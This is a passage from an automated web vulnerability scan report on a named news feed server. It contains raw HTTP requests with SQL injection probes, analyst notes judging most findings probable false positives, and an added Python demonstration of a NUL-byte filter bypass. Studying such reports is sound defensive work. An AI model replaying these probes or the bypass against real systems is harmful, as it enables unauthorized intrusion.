Date: Tue, 07 Dec 2010 23:20:36 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568%00''/200776.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:37 GMT
Content-Length: 0
Connection: close
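
The following is an added example and is not part of this report or of the scanner: a Python demonstration of the NULL byte mechanism described under Remediation detail above, using path segments constructed after the two requests in this entry. It contrasts what a native, NUL-terminated string filter sees with what a length-aware runtime sees, and shows a hardened check; the function names and the use of ctypes to obtain C string semantics are the example's own choices.

```python
# Added example, not from the original report or the scanner. Shows why a
# URL-encoded NUL byte (%00) can carry a quote past a filter written in native
# code while the application still receives the quote.
import ctypes
from urllib.parse import unquote_to_bytes


def native_string_view(buf: bytes) -> bytes:
    """What strlen()/strstr()-style code sees: the bytes up to the first NUL.
    ctypes.c_char_p reads the buffer with C string semantics."""
    return ctypes.c_char_p(buf).value or b""


def naive_native_filter_blocks(segment: bytes) -> bool:
    """Emulates a native filter that scans the decoded segment as a C string."""
    return b"'" in native_string_view(segment)


def app_sees_quote(segment: bytes) -> bool:
    """A length-aware runtime (Java servlet, Python, ...) scans every byte."""
    return b"'" in segment


def hardened_filter_blocks(segment: bytes) -> bool:
    """Fixed filter: reject NUL bytes outright and scan the full length."""
    return b"\x00" in segment or b"'" in segment


def check_segment(raw_segment: str) -> dict:
    """Decode one percent-encoded path segment and compare the three views."""
    decoded = unquote_to_bytes(raw_segment)
    waf = naive_native_filter_blocks(decoded)
    app = app_sees_quote(decoded)
    return {
        "decoded": decoded,
        "naive_filter_blocks": waf,
        "app_sees_quote": app,
        "bypass": app and not waf,          # quote reaches the app unfiltered
        "hardened_filter_blocks": hardened_filter_blocks(decoded),
    }


if __name__ == "__main__":
    # Constructed segments modelled on the requests in this entry.
    for seg in ("568'", "568%00'", "568%00''"):
        print(seg, check_segment(seg))
```

The bypass only applies when the filter inspects the percent-decoded value; a filter that runs on the raw request line sees the literal %00 and the quote. That is one more reason to verify the scanner's claim against the responses above, where the 400 came back without any application header at all.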


1.55. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200777.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200777.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 18366774'%20or%201%3d1--%20 and 18366774'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

As in 1.53, both responses below are 404s and the difference between them is the answering server: Response 1 is the generic IIS/6.0 (ASP.NET) page, Response 2 the ATGPlatform/7.1p1 page on IIS/5.0. The payload again modifies the fixed first segment (mngi) rather than a feed identifier. The pair does not show a single back end behaving differently for 1=1 and 1=2, so it is a probable false positive.

Request 1

GET /mngi18366774'%20or%201%3d1--%20/rss/CustomRssServlet/568/200777.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:21 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi18366774'%20or%201%3d2--%20/rss/CustomRssServlet/568/200777.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:21 GMT
Date: Tue, 07 Dec 2010 23:20:21 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.56. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200778.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200778.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 93033723%20or%201%3d1--%20 and 93033723%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

In the exchange below the 1=1 probe received the generic IIS/6.0 404 page and the 1=2 probe a 200 with an empty body (Content-Length: 0) from the IIS/5.0 ATGPlatform/7.1p1 host, so the two answers again come from different back ends. Entry 1.62 sends the same payload form into the same parameter of 200783.xml and gets the opposite result (200 for 1=1, 404 for 1=2). The status therefore tracks which server answered, not the truth of the injected condition. An empty 200 from ATG for a path whose fourth segment no longer starts with a valid feed identifier is also not what a query returning rows would look like; confirm against a single back end before accepting this finding.

Request 1

GET /mngi/rss/CustomRssServlet/56893033723%20or%201%3d1--%20/200778.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:39 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/56893033723%20or%201%3d2--%20/200778.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:39 GMT
Content-Length: 0
Connection: close


1.57. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200779.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200779.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 18035737'%20or%201%3d1--%20 and 18035737'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Here the payload is appended to the servlet name itself (CustomRssServlet18035737' or 1=1-- ), so neither request addresses CustomRssServlet any more. Response 1 is the generic IIS/6.0 404 page; Response 2 is an empty 200 (Content-Length: 0) from the IIS/5.0 ATGPlatform/7.1 host. The difference is between two servers' handling of an unknown path, not a query result, and the same pattern recurs in 1.60. Probable false positive.

Request 1

GET /mngi/rss/CustomRssServlet18035737'%20or%201%3d1--%20/568/200779.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:41 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet18035737'%20or%201%3d2--%20/568/200779.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:42 GMT
Content-Length: 0
Connection: close


1.58. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200781.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200781.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 11112058'%20or%201%3d1--%20 and 11112058'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Both responses below are 404s; Response 1 comes from IIS/6.0 (ASP.NET) and Response 2 from IIS/5.0 with ATGPlatform/7.1p1. As in 1.53 and 1.55 the only difference is the answering back end, and the payload modifies the fixed first path segment. Probable false positive.

Request 1

GET /mngi11112058'%20or%201%3d1--%20/rss/CustomRssServlet/568/200781.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:34 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi11112058'%20or%201%3d2--%20/rss/CustomRssServlet/568/200781.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:34 GMT
Date: Tue, 07 Dec 2010 23:20:34 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.59. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200782.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200782.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

These are the same two payloads as in 1.53, and the recorded servers are the same two hosts in the opposite order: here the 1=1 probe got the ATGPlatform/7.1 404 on IIS/5.0 and the 1=2 probe the generic IIS/6.0 404. Identical input producing swapped outcomes between two entries is the signature of a load balancer choosing the back end per request, not of a SQL condition being evaluated. Probable false positive.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200782.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:34 GMT
Date: Tue, 07 Dec 2010 23:20:34 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200782.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:34 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.60. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200782.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200782.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 12983011'%20or%201%3d1--%20 and 12983011'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Same pattern as 1.57: the payload alters the servlet name, Response 1 is the generic IIS/6.0 404 page and Response 2 an empty 200 from the IIS/5.0 ATGPlatform/7.1 host. Two back ends, no evidence of a query being evaluated. Probable false positive.

Request 1

GET /mngi/rss/CustomRssServlet12983011'%20or%201%3d1--%20/568/200782.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:40 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet12983011'%20or%201%3d2--%20/568/200782.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:40 GMT
Content-Length: 0
Connection: close


1.61. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200783.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200783.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 13540988'%20or%201%3d1--%20 and 13540988'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Both responses below are 404s from different servers (IIS/6.0 with ASP.NET, then IIS/5.0 with ATGPlatform/7.1), and the payload modifies the fixed first segment. As in 1.53, 1.55 and 1.58 this is a probable false positive.

Request 1

GET /mngi13540988'%20or%201%3d1--%20/rss/CustomRssServlet/568/200783.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:30 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi13540988'%20or%201%3d2--%20/rss/CustomRssServlet/568/200783.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:30 GMT
Date: Tue, 07 Dec 2010 23:20:30 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.62. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200783.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200783.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 39771848%20or%201%3d1--%20 and 39771848%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

On its own this pair looks like a boolean-based result: the 1=1 probe got a 200 and the 1=2 probe a 404. The headers show otherwise. The 200 is an empty body (Content-Length: 0) from the IIS/5.0 ATGPlatform/7.1 host and the 404 is the generic IIS/6.0 page, and entry 1.56, which injects the same payload form into the same parameter of 200778.xml, got the opposite assignment (404 for 1=1, 200 for 1=2). The outcome follows the answering back end rather than the injected condition. Probable false positive; confirm only with both probes served by one host.

Request 1

GET /mngi/rss/CustomRssServlet/56839771848%20or%201%3d1--%20/200783.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:40 GMT
Content-Length: 0
Connection: close

